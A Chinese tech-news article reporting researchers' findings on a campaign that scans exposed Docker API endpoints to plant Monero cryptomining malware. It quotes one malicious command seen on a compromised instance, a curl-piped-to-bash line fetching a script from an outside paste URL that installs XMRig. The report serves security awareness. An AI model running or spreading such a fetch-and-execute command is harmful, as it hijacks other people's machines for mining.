站长之家- 见闻 2019-11-28T11:25:50 +08:00

研究人员发现黑客大规模扫描Docker漏洞以挖掘门罗币

站长之家(ChinaZ.com) 11月28日 消息:据tnw报道,一黑客组织正对企业沙箱软件Docker进行大规模扫描,以搜索系统上易受攻击的端口,以挖掘加密货币。

根据Bad Packets的安全研究人员的说法,从上周末开始的扫描发现了一些漏洞,这些漏洞允许攻击者在公司的Docker实例植入加密货币挖矿恶意代码。

就目前情况来看,攻击者在加密劫持活动已经扫描了超过 59000 个IP网络,寻找易受攻击的Docker实例。研究人员在一个暴露的Docker实例中发现运行下面一行代码:

chroot/mnt/bin/sh-c ' curl-SL4 http://ix.io/1XQa | bash

该恶意代码将从攻击者的服务器下载另一个脚本,然后安装一个加密挖矿工具,Monero miner XMRig。

Bad Packets首席研究官兼联合创始人Troy Mursch称,在这几天针对Docker的攻击活动中,黑客挖掘了14.82 XMR,价值约 740 美元。Mursch建议运行Docker平台的用户立即检查他们是否在互联网上公开了其API端点。

注:Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的 Linux或Windows 机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。

推荐关键词

24小时热搜

查看更多内容

大家正在看

Circle宣布其加密货币投资APP支持门罗币

门罗币:价格低迷的背后

门罗币官方宣布钱包bug已修复

币安研究院:对门罗币分叉的观察

门罗币硬分叉完成,未产生新的数字货币

赞!Firefox 69默认阻止加密劫持和Cookies追踪

海盗湾通知访问者将用其CPU挖掘门罗币(XMR)

门罗币开发商确认修复 Ledger 钱包漏洞